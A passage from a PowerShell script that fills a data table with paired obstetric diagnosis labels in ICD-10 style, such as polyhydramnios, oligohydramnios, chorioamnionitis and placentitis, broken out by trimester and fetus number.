problems, second trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Maternal care for other specified fetal problems, second trimester","Maternal care for other specified fetal problems, second trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Maternal care for other specified fetal problems, second trimester","Maternal care for other specified fetal problems, second trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Maternal care for other specified fetal problems, second trimester","Maternal care for other specified fetal problems, second trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Maternal care for other specified fetal problems, second trimester","Maternal care for other specified fetal problems, second trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Maternal care for other specified fetal problems, second trimester","Maternal care for other specified fetal problems, second trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Maternal care for other specified fetal problems, second trimester","Maternal care for other specified fetal problems, second trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Maternal care for other specified fetal problems, third trimester","Maternal care for other specified fetal problems, third trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Maternal care for other specified fetal problems, third trimester","Maternal care for other specified fetal problems, third trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Maternal care for other specified fetal problems, third trimester","Maternal care for other specified fetal problems, third trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Maternal care for other specified fetal problems, third trimester","Maternal care for other specified fetal problems, third trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Maternal care for other specified fetal problems, third trimester","Maternal care for other specified fetal problems, third trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Maternal care for other specified fetal problems, third trimester","Maternal care for other specified fetal problems, third trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Maternal care for other specified fetal problems, third trimester","Maternal care for other specified fetal problems, third trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Maternal care for other specified fetal problems, unspecified trimester","Maternal care for other specified fetal problems, unspecified trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Maternal care for other specified fetal problems, unspecified trimester","Maternal care for other specified fetal problems, unspecified trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Maternal care for other specified fetal problems, unspecified trimester","Maternal care for other specified fetal problems, unspecified trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Maternal care for other specified fetal problems, unspecified trimester","Maternal care for other specified fetal problems, unspecified trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Maternal care for other specified fetal problems, unspecified trimester","Maternal care for other specified fetal problems, unspecified trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Maternal care for other specified fetal problems, unspecified trimester","Maternal care for other specified fetal problems, unspecified trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Maternal care for other specified fetal problems, unspecified trimester","Maternal care for other specified fetal problems, unspecified trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Maternal care for fetal problem, unspecified, unspecified trimester","Maternal care for fetal problem, unspecified, unspecified trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Maternal care for fetal problem, unspecified, unspecified trimester","Maternal care for fetal problem, unspecified, unspecified trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Maternal care for fetal problem, unspecified, unspecified trimester","Maternal care for fetal problem, unspecified, unspecified trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Maternal care for fetal problem, unspecified, unspecified trimester","Maternal care for fetal problem, unspecified, unspecified trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Maternal care for fetal problem, unspecified, unspecified trimester","Maternal care for fetal problem, unspecified, unspecified trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Maternal care for fetal problem, unspecified, unspecified trimester","Maternal care for fetal problem, unspecified, unspecified trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Maternal care for fetal problem, unspecified, unspecified trimester","Maternal care for fetal problem, unspecified, unspecified trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Maternal care for fetal problem, unspecified, first trimester","Maternal care for fetal problem, unspecified, first trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Maternal care for fetal problem, unspecified, first trimester","Maternal care for fetal problem, unspecified, first trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Maternal care for fetal problem, unspecified, first trimester","Maternal care for fetal problem, unspecified, first trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Maternal care for fetal problem, unspecified, first trimester","Maternal care for fetal problem, unspecified, first trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Maternal care for fetal problem, unspecified, first trimester","Maternal care for fetal problem, unspecified, first trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Maternal care for fetal problem, unspecified, first trimester","Maternal care for fetal problem, unspecified, first trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Maternal care for fetal problem, unspecified, first trimester","Maternal care for fetal problem, unspecified, first trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Maternal care for fetal problem, unspecified, second trimester","Maternal care for fetal problem, unspecified, second trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Maternal care for fetal problem, unspecified, second trimester","Maternal care for fetal problem, unspecified, second trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Maternal care for fetal problem, unspecified, second trimester","Maternal care for fetal problem, unspecified, second trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Maternal care for fetal problem, unspecified, second trimester","Maternal care for fetal problem, unspecified, second trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Maternal care for fetal problem, unspecified, second trimester","Maternal care for fetal problem, unspecified, second trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Maternal care for fetal problem, unspecified, second trimester","Maternal care for fetal problem, unspecified, second trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Maternal care for fetal problem, unspecified, second trimester","Maternal care for fetal problem, unspecified, second trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Maternal care for fetal problem, unspecified, third trimester","Maternal care for fetal problem, unspecified, third trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Maternal care for fetal problem, unspecified, third trimester","Maternal care for fetal problem, unspecified, third trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Maternal care for fetal problem, unspecified, third trimester","Maternal care for fetal problem, unspecified, third trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Maternal care for fetal problem, unspecified, third trimester","Maternal care for fetal problem, unspecified, third trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Maternal care for fetal problem, unspecified, third trimester","Maternal care for fetal problem, unspecified, third trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Maternal care for fetal problem, unspecified, third trimester","Maternal care for fetal problem, unspecified, third trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Maternal care for fetal problem, unspecified, third trimester","Maternal care for fetal problem, unspecified, third trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Polyhydramnios, first trimester","Polyhydramnios, first trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Polyhydramnios, first trimester","Polyhydramnios, first trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Polyhydramnios, first trimester","Polyhydramnios, first trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Polyhydramnios, first trimester","Polyhydramnios, first trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Polyhydramnios, first trimester","Polyhydramnios, first trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Polyhydramnios, first trimester","Polyhydramnios, first trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Polyhydramnios, first trimester","Polyhydramnios, first trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Polyhydramnios, second trimester","Polyhydramnios, second trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Polyhydramnios, second trimester","Polyhydramnios, second trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Polyhydramnios, second trimester","Polyhydramnios, second trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Polyhydramnios, second trimester","Polyhydramnios, second trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Polyhydramnios, second trimester","Polyhydramnios, second trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Polyhydramnios, second trimester","Polyhydramnios, second trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Polyhydramnios, second trimester","Polyhydramnios, second trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Polyhydramnios, third trimester","Polyhydramnios, third trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Polyhydramnios, third trimester","Polyhydramnios, third trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Polyhydramnios, third trimester","Polyhydramnios, third trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Polyhydramnios, third trimester","Polyhydramnios, third trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Polyhydramnios, third trimester","Polyhydramnios, third trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Polyhydramnios, third trimester","Polyhydramnios, third trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Polyhydramnios, third trimester","Polyhydramnios, third trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Polyhydramnios, unspecified trimester","Polyhydramnios, unspecified trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Polyhydramnios, unspecified trimester","Polyhydramnios, unspecified trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Polyhydramnios, unspecified trimester","Polyhydramnios, unspecified trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Polyhydramnios, unspecified trimester","Polyhydramnios, unspecified trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Polyhydramnios, unspecified trimester","Polyhydramnios, unspecified trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Polyhydramnios, unspecified trimester","Polyhydramnios, unspecified trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Polyhydramnios, unspecified trimester","Polyhydramnios, unspecified trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Oligohydramnios, unspecified trimester","Oligohydramnios, unspecified trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Oligohydramnios, unspecified trimester","Oligohydramnios, unspecified trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Oligohydramnios, unspecified trimester","Oligohydramnios, unspecified trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Oligohydramnios, unspecified trimester","Oligohydramnios, unspecified trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Oligohydramnios, unspecified trimester","Oligohydramnios, unspecified trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Oligohydramnios, unspecified trimester","Oligohydramnios, unspecified trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Oligohydramnios, unspecified trimester","Oligohydramnios, unspecified trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Oligohydramnios, first trimester","Oligohydramnios, first trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Oligohydramnios, first trimester","Oligohydramnios, first trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Oligohydramnios, first trimester","Oligohydramnios, first trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Oligohydramnios, first trimester","Oligohydramnios, first trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Oligohydramnios, first trimester","Oligohydramnios, first trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Oligohydramnios, first trimester","Oligohydramnios, first trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Oligohydramnios, first trimester","Oligohydramnios, first trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Oligohydramnios, second trimester","Oligohydramnios, second trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Oligohydramnios, second trimester","Oligohydramnios, second trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Oligohydramnios, second trimester","Oligohydramnios, second trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Oligohydramnios, second trimester","Oligohydramnios, second trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Oligohydramnios, second trimester","Oligohydramnios, second trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Oligohydramnios, second trimester","Oligohydramnios, second trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Oligohydramnios, second trimester","Oligohydramnios, second trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Oligohydramnios, third trimester","Oligohydramnios, third trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Oligohydramnios, third trimester","Oligohydramnios, third trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Oligohydramnios, third trimester","Oligohydramnios, third trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Oligohydramnios, third trimester","Oligohydramnios, third trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Oligohydramnios, third trimester","Oligohydramnios, third trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Oligohydramnios, third trimester","Oligohydramnios, third trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Oligohydramnios, third trimester","Oligohydramnios, third trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Infection of amniotic sac and membranes, unspecified, first trimester","Infection of amniotic sac and membranes, unspecified, first trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Infection of amniotic sac and membranes, unspecified, first trimester","Infection of amniotic sac and membranes, unspecified, first trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Infection of amniotic sac and membranes, unspecified, first trimester","Infection of amniotic sac and membranes, unspecified, first trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Infection of amniotic sac and membranes, unspecified, first trimester","Infection of amniotic sac and membranes, unspecified, first trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Infection of amniotic sac and membranes, unspecified, first trimester","Infection of amniotic sac and membranes, unspecified, first trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Infection of amniotic sac and membranes, unspecified, first trimester","Infection of amniotic sac and membranes, unspecified, first trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Infection of amniotic sac and membranes, unspecified, first trimester","Infection of amniotic sac and membranes, unspecified, first trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Infection of amniotic sac and membranes, unspecified, second trimester","Infection of amniotic sac and membranes, unspecified, second trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Infection of amniotic sac and membranes, unspecified, second trimester","Infection of amniotic sac and membranes, unspecified, second trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Infection of amniotic sac and membranes, unspecified, second trimester","Infection of amniotic sac and membranes, unspecified, second trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Infection of amniotic sac and membranes, unspecified, second trimester","Infection of amniotic sac and membranes, unspecified, second trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Infection of amniotic sac and membranes, unspecified, second trimester","Infection of amniotic sac and membranes, unspecified, second trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Infection of amniotic sac and membranes, unspecified, second trimester","Infection of amniotic sac and membranes, unspecified, second trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Infection of amniotic sac and membranes, unspecified, second trimester","Infection of amniotic sac and membranes, unspecified, second trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Infection of amniotic sac and membranes, unspecified, third trimester","Infection of amniotic sac and membranes, unspecified, third trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Infection of amniotic sac and membranes, unspecified, third trimester","Infection of amniotic sac and membranes, unspecified, third trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Infection of amniotic sac and membranes, unspecified, third trimester","Infection of amniotic sac and membranes, unspecified, third trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Infection of amniotic sac and membranes, unspecified, third trimester","Infection of amniotic sac and membranes, unspecified, third trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Infection of amniotic sac and membranes, unspecified, third trimester","Infection of amniotic sac and membranes, unspecified, third trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Infection of amniotic sac and membranes, unspecified, third trimester","Infection of amniotic sac and membranes, unspecified, third trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Infection of amniotic sac and membranes, unspecified, third trimester","Infection of amniotic sac and membranes, unspecified, third trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Infection of amniotic sac and membranes, unspecified, unspecified trimester","Infection of amniotic sac and membranes, unspecified, unspecified trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Infection of amniotic sac and membranes, unspecified, unspecified trimester","Infection of amniotic sac and membranes, unspecified, unspecified trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Infection of amniotic sac and membranes, unspecified, unspecified trimester","Infection of amniotic sac and membranes, unspecified, unspecified trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Infection of amniotic sac and membranes, unspecified, unspecified trimester","Infection of amniotic sac and membranes, unspecified, unspecified trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Infection of amniotic sac and membranes, unspecified, unspecified trimester","Infection of amniotic sac and membranes, unspecified, unspecified trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Infection of amniotic sac and membranes, unspecified, unspecified trimester","Infection of amniotic sac and membranes, unspecified, unspecified trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Infection of amniotic sac and membranes, unspecified, unspecified trimester","Infection of amniotic sac and membranes, unspecified, unspecified trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Chorioamnionitis, first trimester","Chorioamnionitis, first trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Chorioamnionitis, first trimester","Chorioamnionitis, first trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Chorioamnionitis, first trimester","Chorioamnionitis, first trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Chorioamnionitis, first trimester","Chorioamnionitis, first trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Chorioamnionitis, first trimester","Chorioamnionitis, first trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Chorioamnionitis, first trimester","Chorioamnionitis, first trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Chorioamnionitis, first trimester","Chorioamnionitis, first trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Chorioamnionitis, second trimester","Chorioamnionitis, second trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Chorioamnionitis, second trimester","Chorioamnionitis, second trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Chorioamnionitis, second trimester","Chorioamnionitis, second trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Chorioamnionitis, second trimester","Chorioamnionitis, second trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Chorioamnionitis, second trimester","Chorioamnionitis, second trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Chorioamnionitis, second trimester","Chorioamnionitis, second trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Chorioamnionitis, second trimester","Chorioamnionitis, second trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Chorioamnionitis, third trimester","Chorioamnionitis, third trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Chorioamnionitis, third trimester","Chorioamnionitis, third trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Chorioamnionitis, third trimester","Chorioamnionitis, third trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Chorioamnionitis, third trimester","Chorioamnionitis, third trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Chorioamnionitis, third trimester","Chorioamnionitis, third trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Chorioamnionitis, third trimester","Chorioamnionitis, third trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Chorioamnionitis, third trimester","Chorioamnionitis, third trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Chorioamnionitis, unspecified trimester","Chorioamnionitis, unspecified trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Chorioamnionitis, unspecified trimester","Chorioamnionitis, unspecified trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Chorioamnionitis, unspecified trimester","Chorioamnionitis, unspecified trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Chorioamnionitis, unspecified trimester","Chorioamnionitis, unspecified trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Chorioamnionitis, unspecified trimester","Chorioamnionitis, unspecified trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Chorioamnionitis, unspecified trimester","Chorioamnionitis, unspecified trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Chorioamnionitis, unspecified trimester","Chorioamnionitis, unspecified trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Placentitis, first trimester","Placentitis, first trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Placentitis, first trimester","Placentitis, first trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Placentitis, first trimester","Placentitis, first trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Placentitis, first trimester","Placentitis, first trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Placentitis, first trimester","Placentitis, first trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Placentitis, first trimester","Placentitis, first trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Placentitis, first trimester","Placentitis, first trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Placentitis, second trimester","Placentitis, second trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Placentitis, second trimester","Placentitis, second trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Placentitis, second trimester","Placentitis, second trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Placentitis, second trimester","Placentitis, second trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Placentitis, second trimester","Placentitis, second trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Placentitis, second trimester","Placentitis, second trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Placentitis, second trimester","Placentitis, second trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Placentitis, third trimester","Placentitis, third trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Placentitis, third trimester","Placentitis, third trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Placentitis, third trimester","Placentitis, third trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Placentitis, third trimester","Placentitis, third trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Placentitis, third trimester","Placentitis, third trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Placentitis, third trimester","Placentitis, third trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Placentitis, third trimester","Placentitis, third trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Placentitis, unspecified trimester","Placentitis, unspecified trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Placentitis, unspecified trimester","Placentitis, unspecified trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Placentitis, unspecified trimester","Placentitis, unspecified trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Placentitis, unspecified trimester","Placentitis, unspecified trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Placentitis, unspecified trimester","Placentitis, unspecified trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Placentitis, unspecified trimester","Placentitis, unspecified trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Placentitis, unspecified trimester","Placentitis, unspecified trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Other specified disorders of amniotic fluid and membranes, first trimester","Other specified disorders of amniotic fluid and membranes, first trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Other specified disorders of amniotic fluid and membranes, first trimester","Other specified disorders of amniotic fluid and membranes, first trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Other specified disorders of amniotic fluid and membranes, first trimester","Other specified disorders of amniotic fluid and membranes, first trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Other specified disorders of amniotic fluid and membranes, first trimester","Other specified disorders of amniotic fluid and membranes, first trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Other specified disorders of amniotic fluid and membranes, first trimester","Other specified disorders of amniotic fluid and membranes, first trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Other specified disorders of amniotic fluid and membranes, first trimester","Other specified disorders of amniotic fluid and membranes, first trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Other specified disorders of amniotic fluid and membranes, first trimester","Other specified disorders of amniotic fluid and membranes, first trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Other specified disorders of amniotic fluid and membranes, second trimester","Other specified disorders of amniotic fluid and membranes, second trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Other specified disorders of amniotic fluid and membranes, second trimester","Other specified disorders of amniotic fluid and membranes, second trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Other specified disorders of amniotic fluid and membranes, second trimester","Other specified disorders of amniotic fluid and membranes, second trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Other specified disorders of amniotic fluid and membranes, second trimester","Other specified disorders of amniotic fluid and membranes, second trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Other specified disorders of amniotic fluid and membranes, second trimester","Other specified disorders of amniotic fluid and membranes, second trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Other specified disorders of amniotic fluid and membranes, second trimester","Other specified disorders of amniotic fluid and membranes, second trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Other specified disorders of amniotic fluid and membranes, second trimester","Other specified disorders of amniotic fluid and membranes, second trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Other specified disorders of amniotic fluid and membranes, third trimester","Other specified disorders of amniotic fluid and membranes, third trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Other specified disorders of amniotic fluid and membranes, third trimester","Other specified disorders of amniotic fluid and membranes, third trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Other specified disorders of amniotic fluid and membranes, third trimester","Other specified disorders of amniotic fluid and membranes, third trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Other specified disorders of amniotic fluid and membranes, third trimester","Other specified disorders of amniotic fluid and membranes, third trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Other specified disorders of amniotic fluid and membranes, third trimester","Other specified disorders of amniotic fluid and membranes, third trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Other specified disorders of amniotic fluid and membranes, third trimester","Other specified disorders of amniotic fluid and membranes, third trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Other specified disorders of amniotic fluid and membranes, third trimester","Other specified disorders of amniotic fluid and membranes, third trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Other specified disorders of amniotic fluid and membranes, unspecified trimester","Other specified disorders of amniotic fluid and membranes, unspecified trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Other specified disorders of amniotic fluid and membranes, unspecified trimester","Other specified disorders of amniotic fluid and membranes, unspecified trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Other specified disorders of amniotic fluid and membranes, unspecified trimester","Other specified disorders of amniotic fluid and membranes, unspecified trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Other specified disorders of amniotic fluid and membranes, unspecified trimester","Other specified disorders of amniotic fluid and membranes, unspecified trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Other specified disorders of amniotic fluid and membranes, unspecified trimester","Other specified disorders of amniotic fluid and membranes, unspecified trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Other specified disorders of amniotic fluid and membranes, unspecified trimester","Other specified disorders of amniotic fluid and membranes, unspecified trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Other specified disorders of amniotic fluid and membranes, unspecified trimester","Other specified disorders of amniotic fluid and membranes, unspecified trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Disorder of amniotic fluid and membranes, unspecified, unspecified trimester","Disorder of amniotic fluid and membranes, unspecified, unspecified trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Disorder of amniotic fluid and membranes, unspecified, unspecified trimester","Disorder of amniotic fluid and membranes, unspecified, unspecified trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Disorder of amniotic fluid and membranes, unspecified, unspecified trimester","Disorder of amniotic fluid and membranes, unspecified, unspecified trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Disorder of amniotic fluid and membranes, unspecified, unspecified trimester","Disorder of amniotic fluid and membranes, unspecified, unspecified trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Disorder of amniotic fluid and membranes, unspecified, unspecified trimester","Disorder of amniotic fluid and membranes, unspecified, unspecified trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Disorder of amniotic fluid and membranes, unspecified, unspecified trimester","Disorder of amniotic fluid and membranes, unspecified, unspecified trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Disorder of amniotic fluid and membranes, unspecified, unspecified trimester","Disorder of amniotic fluid and membranes, unspecified, unspecified trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Disorder of amniotic fluid and membranes, unspecified, first trimester","Disorder of amniotic fluid and membranes, unspecified, first trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Disorder of amniotic fluid and membranes, unspecified, first trimester","Disorder of amniotic fluid and membranes, unspecified, first trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Disorder of amniotic fluid and membranes, unspecified, first trimester","Disorder of amniotic fluid and membranes, unspecified, first trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Disorder of amniotic fluid and membranes, unspecified, first trimester","Disorder of amniotic fluid and membranes, unspecified, first trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Disorder of amniotic fluid and membranes, unspecified, first trimester","Disorder of amniotic fluid and membranes, unspecified, first trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Disorder of amniotic fluid and membranes, unspecified, first trimester","Disorder of amniotic fluid and membranes, unspecified, first trimester, 